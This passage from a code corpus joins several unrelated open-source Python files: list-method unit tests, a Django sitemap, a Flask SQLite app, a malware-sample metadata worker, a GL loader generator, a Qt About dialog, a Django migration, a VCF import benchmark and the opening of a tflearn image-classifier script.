self.assertRaises(IndexError, a.__delitem__, 0)
self.assertRaises(TypeError, a.__delitem__)
def test_setslice(self):
l = [0, 1]
a = self.type2test(l)
for i in range(-3, 4):
a[:i] = l[:i]
self.assertEqual(a, l)
a2 = a[:]
a2[:i] = a[:i]
self.assertEqual(a2, a)
a[i:] = l[i:]
self.assertEqual(a, l)
a2 = a[:]
a2[i:] = a[i:]
self.assertEqual(a2, a)
for j in range(-3, 4):
a[i:j] = l[i:j]
self.assertEqual(a, l)
a2 = a[:]
a2[i:j] = a[i:j]
self.assertEqual(a2, a)
aa2 = a2[:]
aa2[:0] = [-2, -1]
self.assertEqual(aa2, [-2, -1, 0, 1])
aa2[0:] = []
self.assertEqual(aa2, [])
a = self.type2test([1, 2, 3, 4, 5])
a[:-1] = a
self.assertEqual(a, self.type2test([1, 2, 3, 4, 5, 5]))
a = self.type2test([1, 2, 3, 4, 5])
a[1:] = a
self.assertEqual(a, self.type2test([1, 1, 2, 3, 4, 5]))
a = self.type2test([1, 2, 3, 4, 5])
a[1:-1] = a
self.assertEqual(a, self.type2test([1, 1, 2, 3, 4, 5, 5]))
a = self.type2test([])
a[:] = tuple(range(10))
self.assertEqual(a, self.type2test(list(range(10))))
if sys.version_info[0] < 3:
self.assertRaises(TypeError, a.__setslice__, 0, 1, 5)
self.assertRaises(TypeError, a.__setslice__)
def test_delslice(self):
a = self.type2test([0, 1])
del a[1:2]
del a[0:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[1:2]
del a[0:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[-2:-1]
self.assertEqual(a, self.type2test([1]))
a = self.type2test([0, 1])
del a[-2:-1]
self.assertEqual(a, self.type2test([1]))
a = self.type2test([0, 1])
del a[1:]
del a[:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[1:]
del a[:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[-1:]
self.assertEqual(a, self.type2test([0]))
a = self.type2test([0, 1])
del a[-1:]
self.assertEqual(a, self.type2test([0]))
a = self.type2test([0, 1])
del a[:]
self.assertEqual(a, self.type2test([]))
def test_append(self):
a = self.type2test([])
a.append(0)
a.append(1)
a.append(2)
self.assertEqual(a, self.type2test([0, 1, 2]))
self.assertRaises(TypeError, a.append)
def test_extend(self):
a1 = self.type2test([0])
a2 = self.type2test((0, 1))
a = a1[:]
a.extend(a2)
self.assertEqual(a, a1 + a2)
a.extend(self.type2test([]))
self.assertEqual(a, a1 + a2)
a.extend(a)
self.assertEqual(a, self.type2test([0, 0, 1, 0, 0, 1]))
a = self.type2test("spam")
a.extend("eggs")
self.assertEqual(a, list("spameggs"))
self.assertRaises(TypeError, a.extend, None)
self.assertRaises(TypeError, a.extend)
def test_insert(self):
a = self.type2test([0, 1, 2])
a.insert(0, -2)
a.insert(1, -1)
a.insert(2, 0)
self.assertEqual(a, [-2, -1, 0, 0, 1, 2])
b = a[:]
b.insert(-2, "foo")
b.insert(-200, "left")
b.insert(200, "right")
self.assertEqual(b, self.type2test(["left",-2,-1,0,0,"foo",1,2,"right"]))
self.assertRaises(TypeError, a.insert)
def test_pop(self):
a = self.type2test([-1, 0, 1])
a.pop()
self.assertEqual(a, [-1, 0])
a.pop(0)
self.assertEqual(a, [0])
self.assertRaises(IndexError, a.pop, 5)
a.pop(0)
self.assertEqual(a, [])
self.assertRaises(IndexError, a.pop)
self.assertRaises(TypeError, a.pop, 42, 42)
a = self.type2test([0, 10, 20, 30, 40])
def test_remove(self):
a = self.type2test([0, 0, 1])
a.remove(1)
self.assertEqual(a, [0, 0])
a.remove(0)
self.assertEqual(a, [0])
a.remove(0)
self.assertEqual(a, [])
self.assertRaises(ValueError, a.remove, 0)
self.assertRaises(TypeError, a.remove)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.remove, BadCmp())
class BadCmp2:
def __eq__(self, other):
raise BadExc()
d = self.type2test('abcdefghcij')
d.remove('c')
self.assertEqual(d, self.type2test('abdefghcij'))
d.remove('c')
self.assertEqual(d, self.type2test('abdefghij'))
self.assertRaises(ValueError, d.remove, 'c')
self.assertEqual(d, self.type2test('abdefghij'))
# Handle comparison errors
d = self.type2test(['a', 'b', BadCmp2(), 'c'])
e = self.type2test(d)
self.assertRaises(BadExc, d.remove, 'c')
for x, y in zip(d, e):
# verify that original order and values are retained.
self.assert_(x is y)
def test_count(self):
a = self.type2test([0, 1, 2])*3
self.assertEqual(a.count(0), 3)
self.assertEqual(a.count(1), 3)
self.assertEqual(a.count(3), 0)
self.assertRaises(TypeError, a.count)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
self.assertRaises(BadExc, a.count, BadCmp())
def test_index(self):
u = self.type2test([0, 1])
self.assertEqual(u.index(0), 0)
self.assertEqual(u.index(1), 1)
self.assertRaises(ValueError, u.index, 2)
u = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(u.count(0), 2)
self.assertEqual(u.index(0), 2)
self.assertEqual(u.index(0, 2), 2)
self.assertEqual(u.index(-2, -10), 0)
self.assertEqual(u.index(0, 3), 3)
self.assertEqual(u.index(0, 3, 4), 3)
self.assertRaises(ValueError, u.index, 2, 0, -10)
self.assertRaises(TypeError, u.index)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.index, BadCmp())
a = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(a.index(0), 2)
self.assertEqual(a.index(0, 2), 2)
self.assertEqual(a.index(0, -4), 2)
self.assertEqual(a.index(-2, -10), 0)
self.assertEqual(a.index(0, 3), 3)
self.assertEqual(a.index(0, -3), 3)
self.assertEqual(a.index(0, 3, 4), 3)
self.assertEqual(a.index(0, -3, -2), 3)
self.assertEqual(a.index(0, -4*sys.maxsize, 4*sys.maxsize), 2)
self.assertRaises(ValueError, a.index, 0, 4*sys.maxsize,-4*sys.maxsize)
self.assertRaises(ValueError, a.index, 2, 0, -10)
a.remove(0)
self.assertRaises(ValueError, a.index, 2, 0, 4)
self.assertEqual(a, self.type2test([-2, -1, 0, 1, 2]))
# Test modifying the list during index's iteration
class EvilCmp:
def __init__(self, victim):
self.victim = victim
def __eq__(self, other):
del self.victim[:]
return False
a = self.type2test()
a[:] = [EvilCmp(a) for _ in range(100)]
# This used to seg fault before patch #1005778
self.assertRaises(ValueError, a.index, None)
def test_reverse(self):
u = self.type2test([-2, -1, 0, 1, 2])
u2 = u[:]
u.reverse()
self.assertEqual(u, [2, 1, 0, -1, -2])
u.reverse()
self.assertEqual(u, u2)
self.assertRaises(TypeError, u.reverse, 42)
def test_clear(self):
u = self.type2test([2, 3, 4])
u.clear()
self.assertEqual(u, [])
u = self.type2test([])
u.clear()
self.assertEqual(u, [])
u = self.type2test([])
u.append(1)
u.clear()
u.append(2)
self.assertEqual(u, [2])
self.assertRaises(TypeError, u.clear, None)
def test_copy(self):
u = self.type2test([1, 2, 3])
v = u.copy()
self.assertEqual(v, [1, 2, 3])
u = self.type2test([])
v = u.copy()
self.assertEqual(v, [])
# test that it's indeed a copy and not a reference
u = self.type2test(['a', 'b'])
v = u.copy()
v.append('i')
self.assertEqual(u, ['a', 'b'])
self.assertEqual(v, u + self.type2test(['i']))
# test that it's a shallow, not a deep copy
u = self.type2test([1, 2, [3, 4], 5])
v = u.copy()
self.assertEqual(u, v)
self.assertIs(v[3], u[3])
self.assertRaises(TypeError, u.copy, None)
def test_sort(self):
u = self.type2test([1, 0])
u.sort()
self.assertEqual(u, [0, 1])
u = self.type2test([2,1,0,-1,-2])
u.sort()
self.assertEqual(u, self.type2test([-2,-1,0,1,2]))
self.assertRaises(TypeError, u.sort, 42, 42)
a = self.type2test(reversed(list(range(512))))
a.sort()
self.assertEqual(a, self.type2test(list(range(512))))
def revcmp(a, b): # pragma: no cover
if a == b:
return 0
elif a < b:
return 1
else: # a > b
return -1
u.sort(key=CmpToKey(revcmp))
self.assertEqual(u, self.type2test([2,1,0,-1,-2]))
# The following dumps core in unpatched Python 1.5:
def myComparison(x,y):
xmod, ymod = x%3, y%7
if xmod == ymod:
return 0
elif xmod < ymod:
return -1
else: # xmod > ymod
return 1
z = self.type2test(list(range(12)))
z.sort(key=CmpToKey(myComparison))
self.assertRaises(TypeError, z.sort, 2)
def selfmodifyingComparison(x,y):
z.append(1)
return cmp(x, y)
self.assertRaises(ValueError, z.sort, key=CmpToKey(selfmodifyingComparison))
if sys.version_info[0] < 3:
self.assertRaises(TypeError, z.sort, lambda x, y: 's')
self.assertRaises(TypeError, z.sort, 42, 42, 42, 42)
def test_slice(self):
u = self.type2test("spam")
u[:2] = "h"
self.assertEqual(u, list("ham"))
def test_iadd(self):
super(CommonTest, self).test_iadd()
u = self.type2test([0, 1])
u2 = u
u += [2, 3]
self.assert_(u is u2)
u = self.type2test("spam")
u += "eggs"
self.assertEqual(u, self.type2test("spameggs"))
self.assertRaises(TypeError, u.__iadd__, None)
def test_imul(self):
u = self.type2test([0, 1])
u *= 3
self.assertEqual(u, self.type2test([0, 1, 0, 1, 0, 1]))
u *= 0
self.assertEqual(u, self.type2test([]))
s = self.type2test([])
oldid = id(s)
s *= 10
self.assertEqual(id(s), oldid)
def test_extendedslicing(self):
# subscript
a = self.type2test([0,1,2,3,4])
# deletion
del a[::2]
self.assertEqual(a, self.type2test([1,3]))
a = self.type2test(list(range(5)))
del a[1::2]
self.assertEqual(a, self.type2test([0,2,4]))
a = self.type2test(list(range(5)))
del a[1::-2]
self.assertEqual(a, self.type2test([0,2,3,4]))
a = self.type2test(list(range(10)))
del a[::1000]
self.assertEqual(a, self.type2test([1, 2, 3, 4, 5, 6, 7, 8, 9]))
# assignment
a = self.type2test(list(range(10)))
a[::2] = [-1]*5
self.assertEqual(a, self.type2test([-1, 1, -1, 3, -1, 5, -1, 7, -1, 9]))
a = self.type2test(list(range(10)))
a[::-4] = [10]*3
self.assertEqual(a, self.type2test([0, 10, 2, 3, 4, 10, 6, 7, 8 ,10]))
a = self.type2test(list(range(4)))
a[::-1] = a
self.assertEqual(a, self.type2test([3, 2, 1, 0]))
a = self.type2test(list(range(10)))
b = a[:]
c = a[:]
a[2:3] = self.type2test(["two", "elements"])
b[slice(2,3)] = self.type2test(["two", "elements"])
c[2:3:] = self.type2test(["two", "elements"])
self.assertEqual(a, b)
self.assertEqual(a, c)
a = self.type2test(list(range(10)))
a[::2] = tuple(range(5))
self.assertEqual(a, self.type2test([0, 1, 1, 3, 2, 5, 3, 7, 4, 9]))
def test_constructor_exception_handling(self):
# Bug #1242657
class Iter(object):
def next(self):
raise KeyboardInterrupt
__next__ = next
class F(object):
def __iter__(self):
return Iter()
self.assertRaises(KeyboardInterrupt, self.type2test, F())
def test_sort_cmp(self):
u = self.type2test([1, 0])
u.sort()
self.assertEqual(u, [0, 1])
u = self.type2test([2,1,0,-1,-2])
u.sort()
self.assertEqual(u, self.type2test([-2,-1,0,1,2]))
self.assertRaises(TypeError, u.sort, 42, 42)
if sys.version_info[0] >= 3:
return # Python 3 removed the cmp option for sort.
def revcmp(a, b):
return cmp(b, a)
u.sort(revcmp)
self.assertEqual(u, self.type2test([2,1,0,-1,-2]))
# The following dumps core in unpatched Python 1.5:
def myComparison(x,y):
return cmp(x%3, y%7)
z = self.type2test(range(12))
z.sort(myComparison)
self.assertRaises(TypeError, z.sort, 2)
def selfmodifyingComparison(x,y):
z.append(1)
return cmp(x, y)
self.assertRaises(ValueError, z.sort, selfmodifyingComparison)
self.assertRaises(TypeError, z.sort, lambda x, y: 's')
self.assertRaises(TypeError, z.sort, 42, 42, 42, 42)
| pfmoore/blist | blist/test/list_tests.py | Python | bsd-3-clause | 19,502 |
# -*- coding: utf-8 -*-
'''
andaluciapeople.com
Copyright (C) 2008-2009 Manuel Martín Salvador <draxus@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from django.contrib.sitemaps import Sitemap
from andaluciapeople.sitios.models import *
from localeurl.utils import locale_url
class SitioSitemap(Sitemap):
    """Sitemap over all Sitio entries, localized for one language."""
    changefreq = 'weekly'
    priority = 0.5

    def __init__(self, language):
        self.language = language

    def items(self):
        return Sitio.objects.all()

    def lastmod(self, obj):
        return obj.fecha

    def location(self, obj):
        # Prefix the object's canonical URL with this sitemap's language.
        url = obj.get_absolute_url()
        return locale_url(url, self.language)
class UsuarioSitemap(Sitemap):
    """Sitemap over all user profiles, localized for one language."""
    changefreq = 'weekly'
    priority = 0.5

    def __init__(self, language):
        self.language = language

    def items(self):
        return DatosUsuario.objects.all()

    def lastmod(self, obj):
        return obj.user.last_login

    def location(self, obj):
        # Prefix the object's canonical URL with this sitemap's language.
        url = obj.get_absolute_url()
        return locale_url(url, self.language)
| DraXus/andaluciapeople | sitios/sitemaps.py | Python | agpl-3.0 | 1,680 |
import os
from adapters import infoVk
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
# Application object; configuration comes from config.DevelopConfig,
# with the SQLite database path placed next to the package.
app = Flask(__name__)
app.config.from_object('config.DevelopConfig')
app.config.update(dict(
    DATABASE=os.path.join(app.root_path, 'bigeyebot.db'),
))
def connect_db():
    """Open and return a new connection to the configured SQLite database."""
    conn = sqlite3.connect(app.config['DATABASE'])
    # Expose rows as sqlite3.Row so columns can be accessed by name.
    conn.row_factory = sqlite3.Row
    return conn
def get_db():
    """Return the application-context database connection.

    Opens a new connection on first use and caches it on ``g`` so the
    same connection is reused for the rest of the request.
    """
    if hasattr(g, 'sqlite_db'):
        return g.sqlite_db
    g.sqlite_db = connect_db()
    return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
    """Closes the database again at the end of the request."""
    # Only close if get_db() actually opened a connection this request.
    if hasattr(g, 'sqlite_db'):
        g.sqlite_db.close()
def init_db():
    """(Re)create the database tables by executing schema.sql."""
    db = get_db()
    with app.open_resource('schema.sql', mode='r') as schema:
        script = schema.read()
    db.cursor().executescript(script)
    db.commit()
@app.cli.command('initdb')
def initdb_command():
    """Initializes the database."""
    # CLI entry point: `flask initdb`.
    init_db()
    print('Initialized the database.')
@app.route('/')
def index():
    # Landing page; static template, no context needed.
    return render_template('index.html')
@app.route('/search/<client_id>')
def get_info(client_id):
    """Look up VK profile info for *client_id* and render the results page.

    Bug fix: the original ``render_template('search.html' info=info)``
    was missing the comma between the positional and keyword argument,
    which is a SyntaxError that prevented the module from importing.
    """
    info = infoVk(str(client_id)).getInfo()
    return render_template('search.html', info=info)
| Wertusser/EyeProject | app.py | Python | apache-2.0 | 1,376 |
#!/usr/bin/python
"""
All filetypes that do not have a specified worker are being picked
up by this Worker. It will collect the general information and hashes
from it.
"""
#Parent
from malzoo.common.abstract import Worker
#Imports
import magic
#Malzoo imports
from time import time
from malzoo.core.tools.general_info import GeneralInformation
from malzoo.core.tools.signatures import Signatures
from malzoo.core.tools.hashes import Hasher
class OtherWorker(Worker):
    # Fallback worker: collects generic metadata and hashes for samples
    # that have no filetype-specific worker (Python 2 syntax throughout).
    def process(self, sample):
        # Build a flat metadata record for the sample and hand it to the
        # shared-data / storage pipeline. `sample` is expected to be a dict
        # with at least 'filename' and 'tag' keys -- TODO confirm against
        # the dispatcher that enqueues samples.
        try:
            hasher = Hasher(sample['filename'])
            general_info = GeneralInformation(sample['filename'])
            sigs_yara = Signatures()
            mymagic = magic.Magic(mime=True)
            sample_info = {
                        'filename'      : general_info.get_filename(),
                        'filetype'      : mymagic.from_file(sample['filename']),
                        'filesize'      : str(general_info.get_filesize()),
                        'md5'           : hasher.get_md5(),
                        'sha1'          : hasher.get_sha1(),
                        'yara_results'  : sigs_yara.scan(sample['filename']),
                        'submit_date'   : int(time()),
                        'sample_type'   : 'other',
                        'id_tag'        : sample['tag']
                        }
            self.share_data(sample_info)
            self.store_sample(sample)
        except Exception, e:
            # Best-effort worker: failures are logged, never propagated.
            self.log('{0} - {1} - {2} '.format('otherworker',sample,e))
        finally:
            # NOTE(review): `return` inside `finally` swallows any exception
            # raised by the logging call above -- presumably intentional for
            # a best-effort pipeline, but worth confirming.
            return
| nheijmans/MalZoo | malzoo/core/workers/otherworker.py | Python | gpl-2.0 | 1,518 |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
from src_util import *
def commandInitStatement (command):
    """Render the loader-initialization line for one GL command."""
    memberName = getFunctionMemberName(command.name)
    typeName = getFunctionTypeName(command.name)
    return "gl->%s\t= (%s)\tloader->get(\"%s\");" % (memberName, typeName, command.name)
def genFuncInit (registry):
    """Generate the glwInit*.inl function-pointer listings."""
    def isIncluded (api, version):
        # Desktop GL entry points from 3.0 onward go into the 'core'
        # listing; everything exposed by GLES2 is included directly.
        if api == 'gl' and version >= "3.0":
            return 'core'
        return api == 'gles2'
    genCommandLists(registry, commandInitStatement,
                    check       = isIncluded,
                    directory   = OPENGL_INC_DIR,
                    filePattern = "glwInit%s.inl",
                    align       = True)

if __name__ == "__main__":
    genFuncInit(getGLRegistry())
from click.testing import CliRunner
from tiledrasterio.scripts.cli import cli
def test_cli_count():
    """Invoking the CLI with '3' exits cleanly and prints three 'False' lines."""
    runner = CliRunner()
    outcome = runner.invoke(cli, ['3'])
    assert outcome.exit_code == 0
    assert outcome.output == "False\nFalse\nFalse\n"
| AsgerPetersen/tiledrasterio | tests/test_cli.py | Python | mit | 252 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pyslvs_ui/info/about.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from qtpy import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """Generated UI scaffolding for the Pyslvs "About" dialog.

    NOTE: this module is produced by the Qt uic tool from about.ui; any
    hand edits here are lost on regeneration (see the header warning).
    """
    def setupUi(self, Dialog):
        """Build the dialog's widget tree, sizers, and signal wiring."""
        Dialog.setObjectName("Dialog")
        Dialog.setEnabled(True)
        Dialog.resize(586, 494)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(":/icons/main.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        Dialog.setWindowIcon(icon)
        Dialog.setSizeGripEnabled(False)
        Dialog.setModal(True)
        self.verticalLayout_7 = QtWidgets.QVBoxLayout(Dialog)
        self.verticalLayout_7.setContentsMargins(-1, 6, 6, 6)
        self.verticalLayout_7.setObjectName("verticalLayout_7")
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.iconLabel = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.iconLabel.sizePolicy().hasHeightForWidth())
        self.iconLabel.setSizePolicy(sizePolicy)
        self.iconLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.iconLabel.setObjectName("iconLabel")
        self.verticalLayout_2.addWidget(self.iconLabel)
        spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem)
        self.horizontalLayout.addLayout(self.verticalLayout_2)
        self.verticalLayout_3 = QtWidgets.QVBoxLayout()
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.title_label = QtWidgets.QLabel(Dialog)
        self.title_label.setText("")
        self.title_label.setObjectName("title_label")
        self.verticalLayout_3.addWidget(self.title_label)
        # Notebook holding the About / LICENSE / Versions / Arguments pages.
        self.tab_widget = QtWidgets.QTabWidget(Dialog)
        self.tab_widget.setObjectName("tab_widget")
        self.AboutTab = QtWidgets.QWidget()
        self.AboutTab.setObjectName("AboutTab")
        self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.AboutTab)
        self.verticalLayout_4.setContentsMargins(6, 6, 6, 6)
        self.verticalLayout_4.setObjectName("verticalLayout_4")
        self.description_text = QtWidgets.QTextBrowser(self.AboutTab)
        self.description_text.setObjectName("description_text")
        self.verticalLayout_4.addWidget(self.description_text)
        self.tab_widget.addTab(self.AboutTab, "")
        self.LicenseTab = QtWidgets.QWidget()
        self.LicenseTab.setObjectName("LicenseTab")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.LicenseTab)
        self.verticalLayout.setObjectName("verticalLayout")
        self.license_text = QtWidgets.QTextBrowser(self.LicenseTab)
        self.license_text.setObjectName("license_text")
        self.verticalLayout.addWidget(self.license_text)
        self.tab_widget.addTab(self.LicenseTab, "")
        self.VersionsTab = QtWidgets.QWidget()
        self.VersionsTab.setObjectName("VersionsTab")
        self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.VersionsTab)
        self.verticalLayout_6.setContentsMargins(6, 6, 6, 6)
        self.verticalLayout_6.setObjectName("verticalLayout_6")
        self.ver_text = QtWidgets.QTextBrowser(self.VersionsTab)
        self.ver_text.setObjectName("ver_text")
        self.verticalLayout_6.addWidget(self.ver_text)
        self.tab_widget.addTab(self.VersionsTab, "")
        self.ArgumentsTab = QtWidgets.QWidget()
        self.ArgumentsTab.setObjectName("ArgumentsTab")
        self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.ArgumentsTab)
        self.verticalLayout_9.setContentsMargins(6, 6, 6, 6)
        self.verticalLayout_9.setObjectName("verticalLayout_9")
        self.args_text = QtWidgets.QTextBrowser(self.ArgumentsTab)
        self.args_text.setObjectName("args_text")
        self.verticalLayout_9.addWidget(self.args_text)
        self.tab_widget.addTab(self.ArgumentsTab, "")
        self.verticalLayout_3.addWidget(self.tab_widget)
        self.horizontalLayout.addLayout(self.verticalLayout_3)
        self.verticalLayout_7.addLayout(self.horizontalLayout)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem1)
        self.button_box = QtWidgets.QDialogButtonBox(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.button_box.sizePolicy().hasHeightForWidth())
        self.button_box.setSizePolicy(sizePolicy)
        self.button_box.setOrientation(QtCore.Qt.Horizontal)
        self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
        self.button_box.setObjectName("button_box")
        self.horizontalLayout_2.addWidget(self.button_box)
        self.verticalLayout_7.addLayout(self.horizontalLayout_2)
        self.retranslateUi(Dialog)
        self.tab_widget.setCurrentIndex(0)
        self.button_box.accepted.connect(Dialog.accept)
        self.button_box.rejected.connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def retranslateUi(self, Dialog):
        """Install all translatable strings (called once from setupUi)."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "About Pyslvs"))
        self.iconLabel.setWhatsThis(_translate("Dialog", "Pyslvs Icon!"))
        self.iconLabel.setText(_translate("Dialog", "<html><head/><body><p><img width=\"80\" src=\":/icons/main.png\"/></p></body></html>"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.AboutTab), _translate("Dialog", "About"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.LicenseTab), _translate("Dialog", "LICENSE"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.VersionsTab), _translate("Dialog", "Versions"))
        self.tab_widget.setTabText(self.tab_widget.indexOf(self.ArgumentsTab), _translate("Dialog", "Arguments"))
        self.button_box.setWhatsThis(_translate("Dialog", "Click to exit"))
from pyslvs_ui import icons_rc
| KmolYuan/Pyslvs-PyQt5 | pyslvs_ui/info/about_ui.py | Python | agpl-3.0 | 6,689 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Replaces the single Position model with two per-entity position
    # tables (MonsterPosition / UserPosition), each storing lat/lon plus
    # an auto-updated date stamp and a FK to its owner.

    dependencies = [
        ('api', '0004_auto_20150716_2026'),
    ]

    operations = [
        migrations.CreateModel(
            name='MonsterPosition',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('latitude', models.FloatField()),
                ('longitude', models.FloatField()),
                ('time', models.DateField(auto_now=True)),
                ('mid', models.ForeignKey(to='api.Monster')),
            ],
        ),
        migrations.CreateModel(
            name='UserPosition',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('latitude', models.FloatField()),
                ('longitude', models.FloatField()),
                ('time', models.DateField(auto_now=True)),
                ('uid', models.ForeignKey(to='api.User')),
            ],
        ),
        # Drop the FK first, then the old model itself.
        migrations.RemoveField(
            model_name='position',
            name='uid',
        ),
        migrations.DeleteModel(
            name='Position',
        ),
    ]
| g82411/s_square | api/migrations/0005_auto_20150725_0026.py | Python | apache-2.0 | 1,321 |
#!env/python3
# coding: utf-8
import os
import sys
import datetime
import subprocess
import argparse
import reprlib
import time
import logging
from config import *
from common import *
from scripts import *
logging.basicConfig(filename=CONFIG["LOG_FILE"],level=logging.INFO)
# Import all bench
BENCHES = {}
BENCHES["B008"] = poc_008.Bench(CONFIG)
for key, bench in BENCHES.items():
    # NOTE(review): the condition is a disabled filter -- presumably it
    # should compare against a CLI-selected script (see the commented-out
    # `args.script == key`); currently every registered bench runs.
    if (True): #args.script == key):
        start_0 = datetime.datetime.now()
        log(bench.description)
        log("Init DB :")
        start_1 = datetime.datetime.now()
        bench.init_db()
        end = datetime.datetime.now()
        log("Init DB done : " + str((end - start_1).seconds) + "s")
        log("File(s) import start : " )
        for file in CONFIG["VCF_FILES"]:
            file = CONFIG["INPUT_ROOT"] + file
            # Count data records (non-header lines) with grep|wc; gzip'd
            # inputs are handled by prefixing "z" (zgrep).
            bashCommand = 'grep -v "^#" ' + str(file) +' | wc -l'
            if file.endswith(".vcf.gz"):
                bashCommand = "z" + bashCommand
            # process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
            process = subprocess.Popen(bashCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            cmd_out = process.communicate()[0]
            records_count = int(cmd_out.decode('utf8'))
            log(" - Start import file : " + file + " (" + str(records_count) + " lines) ("+humansize(file) +")")
            start_1 = datetime.datetime.now()
            bench.import_vcf(file, records_count, CONFIG["LOG_FILE"], CONFIG["STATS_FILE"])
            end = datetime.datetime.now()
            log(" - File import done : " + str((end - start_1).seconds) + "s")
        end = datetime.datetime.now()
        log("All import(s) done : " + str((end - start_0).seconds) + "s")
# run tests | REGOVAR/Sandbox | benchs/db/run.py | Python | agpl-3.0 | 1,635 |
"""
Based on the tflearn example located here:
https://github.com/tflearn/tflearn/blob/master/examples/images/convnet_cifar10.py
"""
from __future__ import division, print_function, absolute_import
# Import tflearn and some helpers
import tflearn
from tflearn.data_utils import shuffle
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.estimator import regression
from tflearn.data_preprocessing import ImagePreprocessing
from tflearn.data_augmentation import ImageAugmentation
import pickle
# Load the data set (pickled (X, Y, X_test, Y_test) arrays of 32x32 RGB images)
X, Y, X_test, Y_test = pickle.load(open("full_dataset.pkl", "rb"))
# Shuffle the data
X, Y = shuffle(X, Y)
# Make sure the data is normalized
img_prep = ImagePreprocessing()
img_prep.add_featurewise_zero_center()
img_prep.add_featurewise_stdnorm()
# Create extra synthetic training data by flipping, rotating and blurring the
# images on our data set.
img_aug = ImageAugmentation()
img_aug.add_random_flip_leftright()
img_aug.add_random_rotation(max_angle=25.)
img_aug.add_random_blur(sigma_max=3.)
# Define our network architecture:
# Input is a 32x32 image with 3 color channels (red, green and blue)
network = input_data(shape=[None, 32, 32, 3],
                     data_preprocessing=img_prep,
                     data_augmentation=img_aug)
# Step 1: Convolution
network = conv_2d(network, 32, 3, activation='relu')
# Step 2: Max pooling
network = max_pool_2d(network, 2)
# Step 3: Convolution again
network = conv_2d(network, 64, 3, activation='relu')
# Step 4: Convolution yet again
network = conv_2d(network, 64, 3, activation='relu')
# Step 5: Max pooling again
network = max_pool_2d(network, 2)
# Step 6: Fully-connected 512 node neural network
